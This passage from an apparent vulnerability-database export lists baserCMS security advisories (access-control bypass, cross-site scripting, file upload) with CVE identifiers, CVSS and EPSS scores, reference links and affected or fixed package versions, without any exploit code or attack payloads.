baserCMS allows remote authenticated attackers to bypass access restrictions to view or alter restricted content via unspecified vectors.
references
0
reference_url http://jvn.jp/en/jp/JVN67881316/index.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN67881316/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-0572
reference_id
reference_type
scores
0
value 0.00193
scoring_system epss
scoring_elements 0.41135
published_at 2026-06-05T12:55:00Z
1
value 0.00193
scoring_system epss
scoring_elements 0.4106
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-0572
2
reference_url https://basercms.net/security/JVN67881316
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN67881316
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-0572
reference_id CVE-2018-0572
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-0572
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.16
purl pkg:composer/baserproject/basercms@3.0.16
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-u16w-rbuk-ybfs
30
vulnerability VCID-uedz-j2vn-cbea
31
vulnerability VCID-vqx2-hzju-r7et
32
vulnerability VCID-xpsb-2yux-g3cf
33
vulnerability VCID-y2sz-c6vb-pkdp
34
vulnerability VCID-zqd4-rdem-jfgk
35
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.16
1
url pkg:composer/baserproject/basercms@4.1.1
purl pkg:composer/baserproject/basercms@4.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-twf5-bzba-gqb4
30
vulnerability VCID-u16w-rbuk-ybfs
31
vulnerability VCID-uedz-j2vn-cbea
32
vulnerability VCID-vqx2-hzju-r7et
33
vulnerability VCID-wvnk-63hy-ykeq
34
vulnerability VCID-xpsb-2yux-g3cf
35
vulnerability VCID-xxud-7jsh-bbc1
36
vulnerability VCID-y2sz-c6vb-pkdp
37
vulnerability VCID-zqd4-rdem-jfgk
38
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.1
aliases CVE-2018-0572, GHSA-mjj9-33j8-pfwh
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-yesf-qxgy-3ygx
44
url VCID-zqd4-rdem-jfgk
vulnerability_id VCID-zqd4-rdem-jfgk
summary
baserCMS has a cross-site scripting vulnerability in blog posts.

### Target
baserCMS 5.2.1 and earlier versions

### Vulnerability

Malicious JavaScript may be executed in blog posts.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page for more information.
https://basercms.net/security/JVN_20837860

### Credits

Gai Tanaka@Mitsui Bussan Secure Directions, Inc.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30879
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01615
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30879
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30879
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30879
6
reference_url https://github.com/advisories/GHSA-jmq3-x8q7-j9qm
reference_id GHSA-jmq3-x8q7-j9qm
reference_type
scores
url https://github.com/advisories/GHSA-jmq3-x8q7-j9qm
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30879, GHSA-jmq3-x8q7-j9qm
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zqd4-rdem-jfgk
45
url VCID-zsgc-fnen-b7a6
vulnerability_id VCID-zsgc-fnen-b7a6
summary
Unrestricted Upload of File with Dangerous Type
baserCMS is a content management system. Prior to version 4.7.5, any file may be uploaded on the management system of baserCMS. Version 4.7.5 contains a patch.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-25655
reference_id
reference_type
scores
0
value 0.00561
scoring_system epss
scoring_elements 0.68669
published_at 2026-06-04T12:55:00Z
1
value 0.00561
scoring_system epss
scoring_elements 0.6871
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-25655
1
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
2
reference_url https://github.com/baserproject/basercms/commit/922025a98b0e697ab78f6a785a004e0729aa9100
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/
url https://github.com/baserproject/basercms/commit/922025a98b0e697ab78f6a785a004e0729aa9100
3
reference_url https://github.com/baserproject/basercms/commit/9297629983ed908c7f51bf61a0231dde91404ebd
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/
url https://github.com/baserproject/basercms/commit/9297629983ed908c7f51bf61a0231dde91404ebd
4
reference_url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/
url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-25655
reference_id CVE-2023-25655
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-25655
6
reference_url https://github.com/advisories/GHSA-mfvg-qwcw-qvc8
reference_id GHSA-mfvg-qwcw-qvc8
reference_type
scores
url https://github.com/advisories/GHSA-mfvg-qwcw-qvc8
7
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-mfvg-qwcw-qvc8
reference_id GHSA-mfvg-qwcw-qvc8
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-mfvg-qwcw-qvc8
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.5
purl pkg:composer/baserproject/basercms@4.7.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-jby7-s5ez-dqb3
9
vulnerability VCID-k5qv-4yp3-zbgf
10
vulnerability VCID-khft-xvrw-g3dr
11
vulnerability VCID-mfm9-gsh3-ubg8
12
vulnerability VCID-nxrf-64er-xbfx
13
vulnerability VCID-p695-t9ye-v3ga
14
vulnerability VCID-pd8c-9d7z-zkhg
15
vulnerability VCID-sqr4-v889-tff8
16
vulnerability VCID-u16w-rbuk-ybfs
17
vulnerability VCID-uedz-j2vn-cbea
18
vulnerability VCID-y2sz-c6vb-pkdp
19
vulnerability VCID-zqd4-rdem-jfgk
20
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.5
aliases CVE-2023-25655, GHSA-mfvg-qwcw-qvc8
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zsgc-fnen-b7a6
46
url VCID-zy68-bur9-1fck
vulnerability_id VCID-zy68-bur9-1fck
summary
Cross-site Scripting
Cross-site scripting vulnerability in baserCMS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
references
0
reference_url http://jvn.jp/en/jp/JVN67881316/index.html
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN67881316/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-0574
reference_id
reference_type
scores
0
value 0.0026
scoring_system epss
scoring_elements 0.49663
published_at 2026-06-05T12:55:00Z
1
value 0.0026
scoring_system epss
scoring_elements 0.49601
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-0574
2
reference_url https://basercms.net/security/JVN67881316
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN67881316
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-0574
reference_id CVE-2018-0574
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-0574
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.16
purl pkg:composer/baserproject/basercms@3.0.16
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-u16w-rbuk-ybfs
30
vulnerability VCID-uedz-j2vn-cbea
31
vulnerability VCID-vqx2-hzju-r7et
32
vulnerability VCID-xpsb-2yux-g3cf
33
vulnerability VCID-y2sz-c6vb-pkdp
34
vulnerability VCID-zqd4-rdem-jfgk
35
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.16
1
url pkg:composer/baserproject/basercms@4.1.1
purl pkg:composer/baserproject/basercms@4.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-twf5-bzba-gqb4
30
vulnerability VCID-u16w-rbuk-ybfs
31
vulnerability VCID-uedz-j2vn-cbea
32
vulnerability VCID-vqx2-hzju-r7et
33
vulnerability VCID-wvnk-63hy-ykeq
34
vulnerability VCID-xpsb-2yux-g3cf
35
vulnerability VCID-xxud-7jsh-bbc1
36
vulnerability VCID-y2sz-c6vb-pkdp
37
vulnerability VCID-zqd4-rdem-jfgk
38
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.1
aliases CVE-2018-0574, GHSA-6qjv-43mf-rgrh
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zy68-bur9-1fck
Fixing_vulnerabilities
0
url VCID-cqu1-32s9-b7b9
vulnerability_id VCID-cqu1-32s9-b7b9
summary
baserCMS Access Control Bypass
baserCMS before 3.0.8 allows remote authenticated users to modify arbitrary user settings via a crafted request.
references
0
reference_url http://basercms.net/security/JVN04855224
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url http://basercms.net/security/JVN04855224
1
reference_url http://jvndb.jvn.jp/jvndb/JVNDB-2015-000138
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url http://jvndb.jvn.jp/jvndb/JVNDB-2015-000138
2
reference_url http://jvn.jp/en/jp/JVN04855224/index.html
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN04855224/index.html
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2015-5640
reference_id
reference_type
scores
0
value 0.00442
scoring_system epss
scoring_elements 0.63612
published_at 2026-06-05T12:55:00Z
1
value 0.00442
scoring_system epss
scoring_elements 0.6357
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2015-5640
4
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2015-5640
reference_id CVE-2015-5640
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2015-5640
6
reference_url https://github.com/advisories/GHSA-v9gf-98vr-mgp2
reference_id GHSA-v9gf-98vr-mgp2
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-v9gf-98vr-mgp2
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.7.1
purl pkg:composer/baserproject/basercms@3.0.7.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-erav-4pk1-wfhc
17
vulnerability VCID-ffq1-r9ck-1bhp
18
vulnerability VCID-g56w-z9cx-5ygv
19
vulnerability VCID-ga9u-uv9b-tydr
20
vulnerability VCID-ggv8-3v9t-mfea
21
vulnerability VCID-gsg3-fdmu-vqag
22
vulnerability VCID-guvm-x5jc-mfgc
23
vulnerability VCID-hpk4-a6tr-3ffe
24
vulnerability VCID-j37y-gws9-ake9
25
vulnerability VCID-jby7-s5ez-dqb3
26
vulnerability VCID-k575-suuf-7bhf
27
vulnerability VCID-k5qv-4yp3-zbgf
28
vulnerability VCID-khft-xvrw-g3dr
29
vulnerability VCID-kmpp-6j49-pqfz
30
vulnerability VCID-mfm9-gsh3-ubg8
31
vulnerability VCID-nxrf-64er-xbfx
32
vulnerability VCID-p695-t9ye-v3ga
33
vulnerability VCID-p6nr-eu91-53b4
34
vulnerability VCID-pd8c-9d7z-zkhg
35
vulnerability VCID-r4jc-22rq-d3cb
36
vulnerability VCID-sqr4-v889-tff8
37
vulnerability VCID-u16w-rbuk-ybfs
38
vulnerability VCID-uedz-j2vn-cbea
39
vulnerability VCID-vqx2-hzju-r7et
40
vulnerability VCID-xpsb-2yux-g3cf
41
vulnerability VCID-y2sz-c6vb-pkdp
42
vulnerability VCID-y9f3-k7xk-rucf
43
vulnerability VCID-yesf-qxgy-3ygx
44
vulnerability VCID-zqd4-rdem-jfgk
45
vulnerability VCID-zsgc-fnen-b7a6
46
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.7.1
1
url pkg:composer/baserproject/basercms@3.0.8
purl pkg:composer/baserproject/basercms@3.0.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-erav-4pk1-wfhc
17
vulnerability VCID-ffq1-r9ck-1bhp
18
vulnerability VCID-g56w-z9cx-5ygv
19
vulnerability VCID-ga9u-uv9b-tydr
20
vulnerability VCID-ggv8-3v9t-mfea
21
vulnerability VCID-gsg3-fdmu-vqag
22
vulnerability VCID-guvm-x5jc-mfgc
23
vulnerability VCID-hpk4-a6tr-3ffe
24
vulnerability VCID-j37y-gws9-ake9
25
vulnerability VCID-jby7-s5ez-dqb3
26
vulnerability VCID-k575-suuf-7bhf
27
vulnerability VCID-k5qv-4yp3-zbgf
28
vulnerability VCID-khft-xvrw-g3dr
29
vulnerability VCID-kmpp-6j49-pqfz
30
vulnerability VCID-mfm9-gsh3-ubg8
31
vulnerability VCID-nxrf-64er-xbfx
32
vulnerability VCID-p695-t9ye-v3ga
33
vulnerability VCID-p6nr-eu91-53b4
34
vulnerability VCID-pd8c-9d7z-zkhg
35
vulnerability VCID-r4jc-22rq-d3cb
36
vulnerability VCID-sqr4-v889-tff8
37
vulnerability VCID-u16w-rbuk-ybfs
38
vulnerability VCID-uedz-j2vn-cbea
39
vulnerability VCID-vqx2-hzju-r7et
40
vulnerability VCID-xpsb-2yux-g3cf
41
vulnerability VCID-y2sz-c6vb-pkdp
42
vulnerability VCID-y9f3-k7xk-rucf
43
vulnerability VCID-yesf-qxgy-3ygx
44
vulnerability VCID-zqd4-rdem-jfgk
45
vulnerability VCID-zsgc-fnen-b7a6
46
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.8
aliases CVE-2015-5640, GHSA-v9gf-98vr-mgp2
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-cqu1-32s9-b7b9
Risk_score 4.5
Resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.8